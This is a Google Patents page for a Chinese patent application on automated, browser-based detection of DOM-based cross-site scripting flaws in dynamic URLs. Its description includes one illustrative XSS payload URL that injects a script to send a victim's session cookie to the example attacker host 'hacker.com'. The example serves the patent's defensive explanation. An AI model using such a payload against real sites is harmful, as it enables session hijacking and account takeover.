CN107800692A - 一种基于web浏览器的XSS漏洞检测方法及系统 - Google Patents
一种基于web浏览器的XSS漏洞检测方法及系统 Download PDFInfo
- Publication number
- CN107800692A CN107800692A CN201710954742.1A CN201710954742A CN107800692A CN 107800692 A CN107800692 A CN 107800692A CN 201710954742 A CN201710954742 A CN 201710954742A CN 107800692 A CN107800692 A CN 107800692A
- Authority
- CN
- China
- Prior art keywords
- xss
- test code
- url
- webpage
- web browser
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1433—Vulnerability analysis
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/57—Certifying or maintaining trusted computer platforms, e.g. secure boots or power-downs, version controls, system software checks, secure updates or assessing vulnerabilities
- G06F21/577—Assessing vulnerabilities and evaluating computer system security
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F2221/00—Indexing scheme relating to security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F2221/03—Indexing scheme relating to G06F21/50, monitoring users, programs or devices to maintain the integrity of platforms
- G06F2221/033—Test or assess software
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- General Engineering & Computer Science (AREA)
- Theoretical Computer Science (AREA)
- Computing Systems (AREA)
- Software Systems (AREA)
- Physics & Mathematics (AREA)
- General Physics & Mathematics (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Computer And Data Communications (AREA)
- Information Transfer Between Computers (AREA)
Abstract
本发明涉及计算机安全技术领域,提供一种基于web浏览器的XSS漏洞检测方法及系统,方法包括:将预先设置的测试代码写入到被测试的动态URL中,所述测试代码用于测试动态URL中特定的XSS漏洞;控制在web浏览器中执行包含有所述测试代码的动态URL;判断所述动态URL是否包含有XSS漏洞;当判定所述动态URL容易受到XSS攻击时,将所述动态URL存储到服务器的数据库中,从而实现对基于DOM的XSS漏洞漏洞检测,测试全面性高,自动化程度高。
Description
技术领域
本发明属于计算机安全技术领域,尤其涉及一种基于web浏览器的XSS漏洞检测方法及系统。
背景技术
跨站脚本(Cross-site Scripting,XSS)是通常在Web应用程序中发现的一种计算机安全漏洞,允许恶意攻击者将代码(例如HTML语言)或客户端脚本代码(例如JavaScript代码)等代码注入用户查看的网页的源代码。例如,通过将JavaScript代码并入网页的源代码中,Web服务器能够将可执行代码发送到浏览器。这样的脚本代码可以被操纵,例如被恶意攻击者更改或替换,以在用户浏览器中执行脚本代码时对用户造成各种类型的损害或危害,例如窃取用户的私人信息,操纵或窃取Cookie,创建可能被误认为是这些的请求的有效用户,在最终用户系统上执行恶意代码等。
目前,存在三种不同类型的XSS漏洞,具体为:
(1)当由与用户相关联的Web客户端提供的数据由服务器端脚本用于为该用户生成动态网页时,会发生第一种类型,通常称为“非持久”或“反映”的XSS漏洞。如果无效的用户提供的数据被包含在没有HTML编码的结果网页中,则可以将客户端代码注入到生成的动态网页中。由反映的XSS引起的一种类型的伤害是,攻击者可能会说服用户遵循向所产生的网页注入代码的恶意URL,从而使攻击者完全访问该页面的内容。
(2)当用户向Web应用程序提供的数据持久存储在Web服务器上(如数据库)中时,就会发生第二种类型,通常称为“存储”,“持久”或“二级”XSS漏洞,文件系统或链接到服务器的其他类型的位置。随后,存储的数据显示在网页中,而不使用HTML实体进行编码。这是最强大的攻击类型,因为攻击者只能将恶意脚本注入一次,由于恶意脚本存储在Web服务器中,因为Web服务器可能会发送恶意脚本,因此可能会损害大量其他用户给许多不同的用户。
(3)第三种类型通常被称为“基于DOM”或“本地”XSS漏洞。使用这种类型,问题存在于网页的客户端脚本本身中。例如,如果一段潜在的恶意JavaScript代码访问URL请求参数并使用此信息将一些HTML写入其自己的页面,如果信息未使用HTML实体进行编码,则可能会出现XSS漏洞。虽然服务器响应不包含任何形式的恶意脚本代码,但URL仍然易受攻击。本地网页中的这种类型的XSS洞可能导致远程执行漏洞。
目前,已经开发了几种检测和防止XSS攻击的方法,过滤是处理XSS预防时最为推荐的解决方案。应用程序可以过滤掉无效输入或编码一些特殊字符,例如编码ASCII和HEX(十六进制)值的所有用户提供的HTML特殊字符,从而防止这些特殊字符被解释为HTML。
为了检测动态URL中是否存在任何XSS漏洞,通常可以使用自动化的工具向URL提交随机数据,然后检查动态生成的响应网页中是否显示相同的随机数据。如果是这样,那么这个URL很可能是脆弱的。然而,这种工具无法检测到基于DOM的XSS漏洞,因为响应网页不包含任何提交的数据,即随机数据。此外,也可能会出现虚假警报,因为该自动化的工具不会使用浏览器来验证XSS漏洞。
发明内容
本发明的目的在于提供一种基于web浏览器的XSS漏洞检测方法,旨在解决现有技术提供的测试工具无法检测到基于DOM的XSS漏洞的问题。
本发明是这样实现的,一种基于web浏览器的XSS漏洞检测方法,所述方法包括下述步骤:
将预先设置的测试代码写入到被测试的动态URL中,所述测试代码用于测试动态URL中特定的XSS漏洞;
控制在web浏览器中执行包含有所述测试代码的动态URL;
判断所述动态URL是否包含有XSS漏洞;
当判定所述动态URL容易受到XSS攻击时,将所述动态URL存储到服务器的数据库中。
作为一种改进的方案,所述方法还包括下述步骤:
预先设置用于测试动态URL中特定的XSS漏洞的测试代码,所述测试代码包含至少一个。
作为一种改进的方案,所述控制在web浏览器中执行包含有所述测试代码的动态URL的步骤具体包括下述步骤:
在所述web浏览器生成web应用请求,并将所述web应用请求发送给服务器的web应用程序;
控制所述服务器的web应用程序对所述web应用请求做出响应,生成网页;
反馈生成的所述网页。
作为一种改进的方案,当所述测试代码有多个时,所述方法还包括下述步骤:
判断是否有剩余的测试代码进行XSS漏洞检测;
若是,则返回执行所述将预先设置的测试代码写入到被测试的动态URL中的步骤;
若否,则结束。
作为一种改进的方案,所述判断所述动态URL是否包含有XSS漏洞的步骤具体包括下述步骤:
所述web浏览器加载反馈的所述网页;
检测查看所述浏览器加载的网页中是否包含所述测试代码;
当所述浏览器加载的网页中包含所述测试代码时,则判定所述动态URL包含有XSS漏洞;
当所述浏览器加载的网页中未包含所述测试代码时,则判定所述动态URL未包含有XSS漏洞。
本发明的另一目的在于提供一种基于web浏览器的XSS漏洞检测系统,所述系统包括:
测试代码写入模块,用于将预先设置的测试代码写入到被测试的动态URL中,所述测试代码用于测试动态URL中特定的XSS漏洞;
URL执行模块,用于控制在web浏览器中执行包含有所述测试代码的动态URL;
漏洞判断模块,用于判断所述动态URL是否包含有XSS漏洞;
URL存储模块,用于当判定所述动态URL容易受到XSS攻击时,将所述动态URL存储到服务器的数据库中。
作为一种改进的方案,所述系统还包括:
测试代码预先设置模块,用于预先设置用于测试动态URL中特定的XSS漏洞的测试代码,所述测试代码包含至少一个。
作为一种改进的方案,所述URL执行模块具体包括:
应用请求生成发送模块,用于在所述web浏览器生成web应用请求,并将所述web应用请求发送给服务器的web应用程序;
网页生成模块,用于控制所述服务器的web应用程序对所述web应用请求做出响应,生成网页;
网页反馈模块,用于反馈生成的所述网页。
作为一种改进的方案,当所述测试代码有多个时,所述系统还包括:
测试代码判断模块,用于判断是否有剩余的测试代码进行XSS漏洞检测;
若是,则返回执行所述测试代码写入模块将预先设置的测试代码写入到被测试的动态URL中的步骤;
若否,则结束。
作为一种改进的方案,所述漏洞判断模块具体包括:
网页加载模块,用于所述web浏览器加载反馈的所述网页;
网页判断模块,用于检测查看所述浏览器加载的网页中是否包含所述测试代码;
第一判定模块,用于当所述浏览器加载的网页中包含所述测试代码时,则判定所述动态URL包含有XSS漏洞;
第二判定模块,用于当所述浏览器加载的网页中未包含所述测试代码时,则判定所述动态URL未包含有XSS漏洞。
在本发明实施例中,将预先设置的测试代码写入到被测试的动态URL中,所述测试代码用于测试动态URL中特定的XSS漏洞;控制在web浏览器中执行包含有所述测试代码的动态URL;判断所述动态URL是否包含有XSS漏洞;当判定所述动态URL容易受到XSS攻击时,将所述动态URL存储到服务器的数据库中,从而实现对基于DOM的XSS漏洞漏洞检测,测试全面性高,自动化程度高。
附图说明
图1是本发明提供的基于web浏览器的XSS漏洞检测方法的实现流程图;
图2是本发明提供的控制在web浏览器中执行包含有所述测试代码的动态URL的实现流程图;
图3是本发明提供的判断所述动态URL是否包含有XSS漏洞的实现流程图;
图4是本发明提供的基于web浏览器的XSS漏洞检测系统的结构框图。
具体实施方式
为了使本发明的目的、技术方案及优点更加清楚明白,以下结合附图及实施例,对本发明进行进一步详细说明。应当理解,此处所描述的具体实施例仅仅用以解释本发明,并不用于限定本发明。
图1示出了本发明提供的基于web浏览器的XSS漏洞检测方法的实现流程图,其具体包括下述步骤:
在步骤S101中,将预先设置的测试代码写入到被测试的动态统一资源定位符(Uniform Resource Locator,URL)中,所述测试代码用于测试动态URL中特定的XSS漏洞。
在步骤S102中,控制在web浏览器中执行包含有所述测试代码的动态URL。
在步骤S103中,判断所述动态URL是否包含有XSS漏洞。
其中,该判断是否包含XSS漏洞的步骤,下述有详细说明,在此不再赘述。
在步骤S104中,当判定所述动态URL容易受到XSS攻击时,将所述动态URL存储到服务器的数据库中。
在该实施例中,在执行上述步骤S101之前,还需要执行下述步骤:
预先设置用于测试动态URL中特定的XSS漏洞的测试代码,所述测试代码包含至少一个;
该测试代码可以根据实际的XSS漏洞的种类进行对应设置,以便模拟各种XSS攻击。
在本发明实施例中,如图2所示,控制在web浏览器中执行包含有所述测试代码的动态URL的步骤具体包括下述步骤:
在步骤S201中,在所述web浏览器生成web应用请求,并将所述web应用请求发送给服务器的web应用程序。
在步骤S202中,控制所述服务器的web应用程序对所述web应用请求做出响应,生成网页。
在步骤S203中,反馈生成的所述网页。
在该实施例中,当所述测试代码有多个时,所述方法还包括下述步骤:
判断是否有剩余的测试代码进行XSS漏洞检测;
若是,则返回执行所述将预先设置的测试代码写入到被测试的动态URL中的步骤;
若否,则结束。
在本发明实施例中,如图3所示,判断所述动态URL是否包含有XSS漏洞的步骤具体包括下述步骤:
在步骤S301中,web浏览器加载反馈的所述网页。
在步骤S302中,检测查看所述浏览器加载的网页中是否包含所述测试代码,是则执行步骤S303,否则执行步骤S304。
在步骤S303中,当所述浏览器加载的网页中包含所述测试代码时,则判定所述动态URL包含有XSS漏洞。
在步骤S304中,当所述浏览器加载的网页中未包含所述测试代码时,则判定所述动态URL未包含有XSS漏洞。
在本发明实施例中,由于其固有的属性,动态URL可能容易遭受XSS攻击,动态URL必须包括某些类型的代码,例如可以在浏览器中执行的客户端脚本(例如JavaScript、VBScript、ActiveX、HTML和Flash)或服务器端脚本(例如,超文本预处理器或PHP),通常,在执行此类代码时,某些结果可能会出现在网页中。例如,假设Web应用程序具有打印错误消息的功能,此功能的URL可能是:http://example.com/error.php?message=Sorry%2c+error
当在客户端的浏览器中执行此URL时,浏览器发送请求Web服务器的URL,并且响应该请求,Web服务器生成并返回包括字符串的网页,即错误消息:
Sorry,error
上述URL可能容易受到XSS攻击,因为攻击者可能会用一段恶意代码替换URL的错误消息部分。
假设一个用户登录到web应用程序的网站,并发出一个cookie:sessionid=165a9148ed37434294a3
攻击者将以下制作的URL提供给用户:
http://example.com/error.php?message=<script>var+i=new+Im-age;+i.src="http://hacker.com/"%2bdocument.cookie;</script>
请注意,URL的原始错误消息部分已被一段恶意脚本代码替换。当用户的浏览器执行此制作的URL时,制作的URL将通过浏览器请求发送到Web应用程序,然后生成并返回包含以下恶意代码的响应网页:<script>var i=new Image;i.src=http://hacker.com/%2bdocument.cookie;</script>用户的浏览器在加载网页时执行脚本代码,并向攻击者的网站“hacker.com”发送包含用户的cookie(即“sessionid”)的请求。攻击者的网站捕获用户的sessionid,此后可以将用户作为Web应用程序执行操作。
在本发明实施例中,该基于web浏览器的XSS漏洞的检测可以在客户端执行,也可以在服务器端执行,其具体的实现方案如上述方法所记载,其中,当在客户端执行时,还需要执行下述步骤:
判断选取的被测试的URL是静态的还是动态的,若该URL是动态的,则执行上述步骤S101,若是静态的结束。
在本发明实施例中,当在客户端执行该基于web浏览器的XSS漏洞检测方案时,可以以实时或分批的方式执行,没有必要实时测试和分析动态URL,因为其可能会减慢用户的计算机速度。当用户的计算机处于空闲模式时,执行上述方案。
在本发明实施例中,基于客户端和服务器的上述基于web浏览器的XSS漏洞检测方案运行在网络架构之上,该网络架构包括但不限于TCP/IP的网络、电信网络和无线网络等。
图4示出了本发明提供的基于web浏览器的XSS漏洞检测系统的结构框图,为了便于说明,图中仅给出了与本发明实施例相关的部分。
测试代码写入模块11,用于将预先设置的测试代码写入到被测试的动态URL中,所述测试代码用于测试动态URL中特定的XSS漏洞;
URL执行模块12,用于控制在web浏览器中执行包含有所述测试代码的动态URL;
漏洞判断模块13,用于判断所述动态URL是否包含有XSS漏洞;
URL存储模块14,用于当判定所述动态URL容易受到XSS攻击时,将所述动态URL存储到服务器的数据库中。
其中,测试代码预先设置模块15,用于预先设置用于测试动态URL中特定的XSS漏洞的测试代码,所述测试代码包含至少一个。
在本发明实施例中,URL执行模块12具体包括:
应用请求生成发送模块16,用于在所述web浏览器生成web应用请求,并将所述web应用请求发送给服务器的web应用程序;
网页生成模块17,用于控制所述服务器的web应用程序对所述web应用请求做出响应,生成网页;
网页反馈模块18,用于反馈生成的所述网页。
在本发明实施例中,当所述测试代码有多个时,所述系统还包括:
测试代码判断模块19,用于判断是否有剩余的测试代码进行XSS漏洞检测;
若是,则返回执行所述测试代码写入模块将预先设置的测试代码写入到被测试的动态URL中的步骤;
若否,则结束。
在本发明实施例中,漏洞判断模块13具体包括:
网页加载模块20,用于所述web浏览器加载反馈的所述网页;
网页判断模块21,用于检测查看所述浏览器加载的网页中是否包含所述测试代码;
第一判定模块22,用于当所述浏览器加载的网页中包含所述测试代码时,则判定所述动态URL包含有XSS漏洞;
第二判定模块23,用于当所述浏览器加载的网页中未包含所述测试代码时,则判定所述动态URL未包含有XSS漏洞。
上述各个模块的功能如上述方法实施例所记载,在此不再赘述。
在本发明实施例中,将预先设置的测试代码写入到被测试的动态URL中,所述测试代码用于测试动态URL中特定的XSS漏洞;控制在web浏览器中执行包含有所述测试代码的动态URL;判断所述动态URL是否包含有XSS漏洞;当判定所述动态URL容易受到XSS攻击时,将所述动态URL存储到服务器的数据库中,从而实现对基于DOM的XSS漏洞漏洞检测,测试全面性高,自动化程度高。
以上所述仅为本发明的较佳实施例而已,并不用以限制本发明,凡在本发明的精神和原则之内所作的任何修改、等同替换和改进等,均应包含在本发明的保护范围之内。
Claims (10)
1.一种基于web浏览器的XSS漏洞检测方法,其特征在于,所述方法包括下述步骤:
将预先设置的测试代码写入到被测试的动态URL中,所述测试代码用于测试动态URL中特定的XSS漏洞;
控制在web浏览器中执行包含有所述测试代码的动态URL;
判断所述动态URL是否包含有XSS漏洞;
当判定所述动态URL容易受到XSS攻击时,将所述动态URL存储到服务器的数据库中。
2.根据权利要求1所述的基于web浏览器的XSS漏洞检测方法,其特征在于,所述方法还包括下述步骤:
预先设置用于测试动态URL中特定的XSS漏洞的测试代码,所述测试代码包含至少一个。
3.根据权利要求2所述的基于web浏览器的XSS漏洞检测方法,其特征在于,所述控制在web浏览器中执行包含有所述测试代码的动态URL的步骤具体包括下述步骤:
在所述web浏览器生成web应用请求,并将所述web应用请求发送给服务器的web应用程序;
控制所述服务器的web应用程序对所述web应用请求做出响应,生成网页;
反馈生成的所述网页。
4.根据权利要求3所述的基于web浏览器的XSS漏洞检测方法,其特征在于,当所述测试代码有多个时,所述方法还包括下述步骤:
判断是否有剩余的测试代码进行XSS漏洞检测;
若是,则返回执行所述将预先设置的测试代码写入到被测试的动态URL中的步骤;
若否,则结束。
5.根据权利要求4所述的基于web浏览器的XSS漏洞检测方法,其特征在于,所述判断所述动态URL是否包含有XSS漏洞的步骤具体包括下述步骤:
所述web浏览器加载反馈的所述网页;
检测查看所述浏览器加载的网页中是否包含所述测试代码;
当所述浏览器加载的网页中包含所述测试代码时,则判定所述动态URL包含有XSS漏洞;
当所述浏览器加载的网页中未包含所述测试代码时,则判定所述动态URL未包含有XSS漏洞。
6.一种基于web浏览器的XSS漏洞检测系统,其特征在于,所述系统包括:
测试代码写入模块,用于将预先设置的测试代码写入到被测试的动态URL中,所述测试代码用于测试动态URL中特定的XSS漏洞;
URL执行模块,用于控制在web浏览器中执行包含有所述测试代码的动态URL;
漏洞判断模块,用于判断所述动态URL是否包含有XSS漏洞;
URL存储模块,用于当判定所述动态URL容易受到XSS攻击时,将所述动态URL存储到服务器的数据库中。
7.根据权利要求6所述的基于web浏览器的XSS漏洞检测系统,其特征在于,所述系统还包括:
测试代码预先设置模块,用于预先设置用于测试动态URL中特定的XSS漏洞的测试代码,所述测试代码包含至少一个。
8.根据权利要求7所述的基于web浏览器的XSS漏洞检测系统,其特征在于,所述URL执行模块具体包括:
应用请求生成发送模块,用于在所述web浏览器生成web应用请求,并将所述web应用请求发送给服务器的web应用程序;
网页生成模块,用于控制所述服务器的web应用程序对所述web应用请求做出响应,生成网页;
网页反馈模块,用于反馈生成的所述网页。
9.根据权利要求8所述的基于web浏览器的XSS漏洞检测系统,其特征在于,当所述测试代码有多个时,所述系统还包括:
测试代码判断模块,用于判断是否有剩余的测试代码进行XSS漏洞检测;
若是,则返回执行所述测试代码写入模块将预先设置的测试代码写入到被测试的动态URL中的步骤;
若否,则结束。
10.根据权利要求9所述的基于web浏览器的XSS漏洞检测系统,其特征在于,所述漏洞判断模块具体包括:
网页加载模块,用于所述web浏览器加载反馈的所述网页;
网页判断模块,用于检测查看所述浏览器加载的网页中是否包含所述测试代码;
第一判定模块,用于当所述浏览器加载的网页中包含所述测试代码时,则判定所述动态URL包含有XSS漏洞;
第二判定模块,用于当所述浏览器加载的网页中未包含所述测试代码时,则判定所述动态URL未包含有XSS漏洞。
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201710954742.1A CN107800692A (zh) | 2017-10-13 | 2017-10-13 | 一种基于web浏览器的XSS漏洞检测方法及系统 |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201710954742.1A CN107800692A (zh) | 2017-10-13 | 2017-10-13 | 一种基于web浏览器的XSS漏洞检测方法及系统 |
Publications (1)
Publication Number | Publication Date |
---|---|
CN107800692A true CN107800692A (zh) | 2018-03-13 |
Family
ID=61533053
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN201710954742.1A Pending CN107800692A (zh) | 2017-10-13 | 2017-10-13 | 一种基于web浏览器的XSS漏洞检测方法及系统 |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN107800692A (zh) |
Cited By (3)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN110417800A (zh) * | 2019-08-05 | 2019-11-05 | 杭州安恒信息技术股份有限公司 | Ldap注入漏洞的检测方法和装置 |
CN110874475A (zh) * | 2018-08-30 | 2020-03-10 | 重庆小雨点小额贷款有限公司 | 漏洞挖掘方法、漏洞挖掘平台及计算机可读存储介质 |
CN116170243A (zh) * | 2023-04-26 | 2023-05-26 | 北京安博通科技股份有限公司 | 基于poc生成规则文件的方法、装置、电子设备及介质 |
Citations (6)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN103095681A (zh) * | 2012-12-03 | 2013-05-08 | 微梦创科网络科技(中国)有限公司 | 一种检测漏洞的方法及装置 |
CN104683328A (zh) * | 2015-01-29 | 2015-06-03 | 兴华永恒(北京)科技有限责任公司 | 一种跨站漏洞扫描方法及系统 |
CN104881607A (zh) * | 2015-05-21 | 2015-09-02 | 北京工业大学 | 一种基于模拟浏览器行为的xss漏洞检测系统 |
CN105678170A (zh) * | 2016-01-05 | 2016-06-15 | 广东工业大学 | 一种动态检测xss漏洞的方法 |
CN106022135A (zh) * | 2016-02-23 | 2016-10-12 | 北京工业大学 | 一种可动态判断xss漏洞的自动化检测系统 |
US20170213032A1 (en) * | 2014-10-17 | 2017-07-27 | Alibaba Group Holding Limited | Method and device for providing access page |
-
2017
- 2017-10-13 CN CN201710954742.1A patent/CN107800692A/zh active Pending
Patent Citations (6)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN103095681A (zh) * | 2012-12-03 | 2013-05-08 | 微梦创科网络科技(中国)有限公司 | 一种检测漏洞的方法及装置 |
US20170213032A1 (en) * | 2014-10-17 | 2017-07-27 | Alibaba Group Holding Limited | Method and device for providing access page |
CN104683328A (zh) * | 2015-01-29 | 2015-06-03 | 兴华永恒(北京)科技有限责任公司 | 一种跨站漏洞扫描方法及系统 |
CN104881607A (zh) * | 2015-05-21 | 2015-09-02 | 北京工业大学 | 一种基于模拟浏览器行为的xss漏洞检测系统 |
CN105678170A (zh) * | 2016-01-05 | 2016-06-15 | 广东工业大学 | 一种动态检测xss漏洞的方法 |
CN106022135A (zh) * | 2016-02-23 | 2016-10-12 | 北京工业大学 | 一种可动态判断xss漏洞的自动化检测系统 |
Non-Patent Citations (2)
Title |
---|
张伟伟: "基于特征注入的XSS漏洞检测模型研究", 《中国优秀硕士学位论文全文数据库(电子期刊)》 * |
顾明昌,王丹,赵文兵,付利华: "一种基于攻击向量自动生成的XSS漏洞渗透测试方法", 《软件导刊》 * |
Cited By (3)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN110874475A (zh) * | 2018-08-30 | 2020-03-10 | 重庆小雨点小额贷款有限公司 | 漏洞挖掘方法、漏洞挖掘平台及计算机可读存储介质 |
CN110417800A (zh) * | 2019-08-05 | 2019-11-05 | 杭州安恒信息技术股份有限公司 | Ldap注入漏洞的检测方法和装置 |
CN116170243A (zh) * | 2023-04-26 | 2023-05-26 | 北京安博通科技股份有限公司 | 基于poc生成规则文件的方法、装置、电子设备及介质 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
US10243679B2 (en) | Vulnerability detection | |
US8949990B1 (en) | Script-based XSS vulnerability detection | |
Lekies et al. | 25 million flows later: large-scale detection of DOM-based XSS | |
Shar et al. | Automated removal of cross site scripting vulnerabilities in web applications | |
Gupta et al. | Hunting for DOM-Based XSS vulnerabilities in mobile cloud-based online social network | |
Fonseca et al. | Testing and comparing web vulnerability scanning tools for SQL injection and XSS attacks | |
KR101001132B1 (ko) | 웹 어플리케이션의 취약성 판단 방법 및 시스템 | |
CN101964025B (zh) | Xss检测方法和设备 | |
CN108989355B (zh) | 一种漏洞检测方法和装置 | |
Van Acker et al. | FlashOver: Automated discovery of cross-site scripting vulnerabilities in rich internet applications | |
CN105791261B (zh) | 一种跨站脚本攻击的检测方法和检测设备 | |
CN109347882B (zh) | 网页木马监测方法、装置、设备及存储介质 | |
US20190222587A1 (en) | System and method for detection of attacks in a computer network using deception elements | |
CN103647678A (zh) | 一种网站漏洞在线验证方法及装置 | |
CN110460612A (zh) | 安全测试方法、设备、存储介质及装置 | |
CN105488400A (zh) | 一种恶意网页综合检测方法及系统 | |
CN102970282A (zh) | 网站安全检测系统 | |
CN107800692A (zh) | 一种基于web浏览器的XSS漏洞检测方法及系统 | |
Hou et al. | A dynamic detection technique for XSS vulnerabilities | |
Wang et al. | A new cross-site scripting detection mechanism integrated with HTML5 and CORS properties by using browser extensions | |
Li et al. | The application of fuzzing in web software security vulnerabilities test | |
CN113190839A (zh) | 一种基于SQL注入的web攻击防护方法及系统 | |
CN111611590A (zh) | 涉及应用程序的数据安全的方法及装置 | |
CN107026854A (zh) | 漏洞验证方法及装置 | |
CN112287349A (zh) | 安全漏洞检测方法及服务端 |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
SE01 | Entry into force of request for substantive examination | ||
RJ01 | Rejection of invention patent application after publication |
Application publication date: 20180313 |
|
RJ01 | Rejection of invention patent application after publication |